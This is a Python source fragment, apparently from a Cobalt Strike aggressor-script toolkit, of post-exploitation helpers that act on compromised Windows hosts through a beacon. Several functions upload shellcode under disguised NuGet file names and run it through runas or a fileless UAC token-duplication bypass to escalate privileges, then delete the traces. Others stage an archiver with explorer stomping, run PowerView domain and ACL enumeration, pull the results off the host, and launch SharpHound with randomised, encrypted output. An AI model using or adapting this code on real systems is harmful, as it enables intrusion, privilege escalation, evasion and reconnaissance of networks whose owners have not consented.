def elevate_shellcode_helper(bid, shellcode, function):
"""
Execute `shellcode` with a helper using <function> -Binary helper.exe -Arguments <shellcode>
"""
native_helper = utils.basedir('tools/native.exe')
native_helper_remote = r'{}\NugetPackage.exe'.format(
helpers.guess_temp(bid))
shellcode_remote = r'{}\nuget.package'.format(helpers.guess_temp(bid))
# delete first
aggressor.brm(bid, native_helper_remote, silent=True)
aggressor.brm(bid, shellcode_remote, silent=True)
# upload
helpers.upload_to(bid, native_helper, native_helper_remote, silent=True)
helpers.upload_to(bid, shellcode, shellcode_remote, silent=True)
# invoke
command = '{} {}'.format(native_helper_remote, shellcode_remote)
function(bid, command)
# clean up
aggressor.brm(bid, native_helper_remote, silent=True)
aggressor.brm(bid, shellcode_remote, silent=True)
def elevate_runas_shellcode(bid, user, password, shellcode):
"""
Elevate with token duplication bypass. Execute `shellcode` with a helper.
"""
native_helper = utils.basedir('tools/native.exe')
native_helper_remote = r'{}\NugetPackage.{}.exe'.format(
helpers.guess_temp(bid), helpers.randstr())
shellcode_remote = r'{}\nuget2.package'.format(helpers.guess_temp(bid))
# delete first
aggressor.brm(bid, native_helper_remote, silent=True)
aggressor.brm(bid, shellcode_remote, silent=True)
aggressor.blog2(
bid, 'uploading to {} and {}'.format(native_helper_remote,
shellcode_remote))
# upload
helpers.upload_to(bid, native_helper, native_helper_remote, silent=True)
helpers.upload_to(bid, shellcode, shellcode_remote, silent=True)
if '\\' in user:
domain, user = user.split('\\')
else:
raise RuntimeError('must specify user domain')
# invoke
aggressor.brunas(bid, domain, user, password, native_helper_remote)
# clean up
aggressor.brm(bid, native_helper_remote, silent=True)
aggressor.brm(bid, shellcode_remote, silent=True)
def elevate_token_shellcode_csharp(bid, shellcode):
"""
Elevate with token duplication bypass. Execute `shellcode` with a C# helper.
"""
aggressor.bpowershell_import(
bid, utils.basedir('modules/FilelessUACBypass.ps1'))
execute_shellcode = utils.basedir('tools/execute_shellcode.exe')
execute_assembly = utils.basedir('tools/execute_assembly.exe')
stage1 = r'{}\NugetPackage.exe'.format(helpers.guess_temp(bid))
#stage2 = r'{}\nuget_update.package'.format(helpers.guess_temp(bid))
stage2 = r'{}\Stage2.exe'.format(helpers.guess_temp(bid))
package = r'{}\nuget.package'.format(helpers.guess_temp(bid))
helpers.upload_to(bid, execute_assembly, stage1)
helpers.upload_to(bid, execute_shellcode, stage2)
helpers.upload_to(bid, shellcode, package)
command = 'Invoke-TokenDuplication -Binary {}'.format(
powershell_quote(stage2))
aggressor.bpowerpick(bid, command)
aggressor.brm(bid, stage1)
aggressor.brm(bid, stage2)
aggressor.brm(bid, package)
def _(bid):
global _uploaded
temp = helpers.guess_temp(bid)
dest = r'{}\7za.exe'.format(temp)
helpers.upload_to(bid, utils.basedir('tools/7za.exe'), dest)
helpers.explorer_stomp(bid, '7za.exe')
_uploaded = dest
def _(bid):
temp = helpers.guess_temp(bid)
aggressor.btask(
bid, 'Tasked beacon to clean up files from domain-enum (stage 3/3)')
aggressor.brm(bid, r'{}\objects.domain'.format(temp))
aggressor.brm(bid, r'{}\policy.domain'.format(temp))
aggressor.brm(bid, r'{}\sites.domain'.format(temp))
aggressor.brm(bid, r'{}\subnets.domain'.format(temp))
aggressor.brm(bid, r'{}\gpo_localgroups.domain'.format(temp))
aggressor.brm(bid, r'{}\gpo_delegations.domain'.format(temp))
aggressor.brm(bid, r'{}\gpo_acls.domain'.format(temp))
aggressor.brm(bid, r'{}\trusts.domain'.format(temp))
aggressor.brm(bid, r'{}\managers.domain'.format(temp))
aggressor.brm(bid, r'{}\interesting_acls.domain'.format(temp))
def _(bid):
temp = helpers.guess_temp(bid)
aggressor.btask(
bid,
'Tasked beacon to download files from domain-enum (stage 2/3). Once finished run domain-enum-next2'
)
aggressor.bdownload(bid, r'{}\objects.domain'.format(temp))
aggressor.bdownload(bid, r'{}\policy.domain'.format(temp))
aggressor.bdownload(bid, r'{}\sites.domain'.format(temp))
aggressor.bdownload(bid, r'{}\subnets.domain'.format(temp))
aggressor.bdownload(bid, r'{}\gpo_localgroups.domain'.format(temp))
aggressor.bdownload(bid, r'{}\gpo_delegations.domain'.format(temp))
aggressor.bdownload(bid, r'{}\gpo_acls.domain'.format(temp))
aggressor.bdownload(bid, r'{}\trusts.domain'.format(temp))
aggressor.bdownload(bid, r'{}\managers.domain'.format(temp))
aggressor.bdownload(bid, r'{}\interesting_acls.domain'.format(temp))
def _(bid):
temp = helpers.guess_temp(bid)
# Forests and trusts:
# Get-DomainTrustMapping
# Get-ForestTrust
# Get-DomainTrust
# Parsing GPOs:
# Get-GptTmpl
# Get-GroupsXML
# File shares:
# Get-DomainFileServer
# Get-DomainDFSShare
# Get-DomainManagedSecurityGroup?
# TODO remove subnet and site?
# computer objects don't show up in Get-DomainObject for some reason
command = helpers.code_string(r"""
cd {}
$FormatEnumerationLimit=-1
Get-DomainObject | Format-List -Property * > objects.domain
Get-DomainPolicyData | Format-List -Property * > policy.domain
Get-DomainSite | Format-List -Property * > sites.domain
Get-DomainSubnet | Format-List -Property * > subnets.domain
Get-DomainGPOUserLocalGroupMapping | Format-List -Property * > gpo_localgroups.domain
Get-GPODelegation | Format-List -Property * > gpo_delegations.domain
Get-DomainGPO | %{{Get-ObjectACL -ResolveGUIDs -Name $_.Name}} > gpo_acls.domain
Get-DomainTrustMapping | Format-List -Property * > trusts.domain
Get-DomainManagedSecurityGroup | Format-List -Property * > managers.domain
Invoke-ACLScanner -ResolveGUIDs > interesting_acls.domain
echo "All finished with domain-enum. Run domain-enum-next."
""".format(powershell_quote(temp)))
aggressor.btask(
bid, 'Tasked beacon to enumerate domain objects and info (stage 1/3)')
external.run(bid, 'powerview', command)
def run_sharphound(bid, args, silent=False):
temp = helpers.guess_temp(bid)
args = ['--RandomFilenames', '--EncryptZip', '--JsonFolder', temp
] + list(args)
run(bid, 'sharphound-raw', args, silent=silent)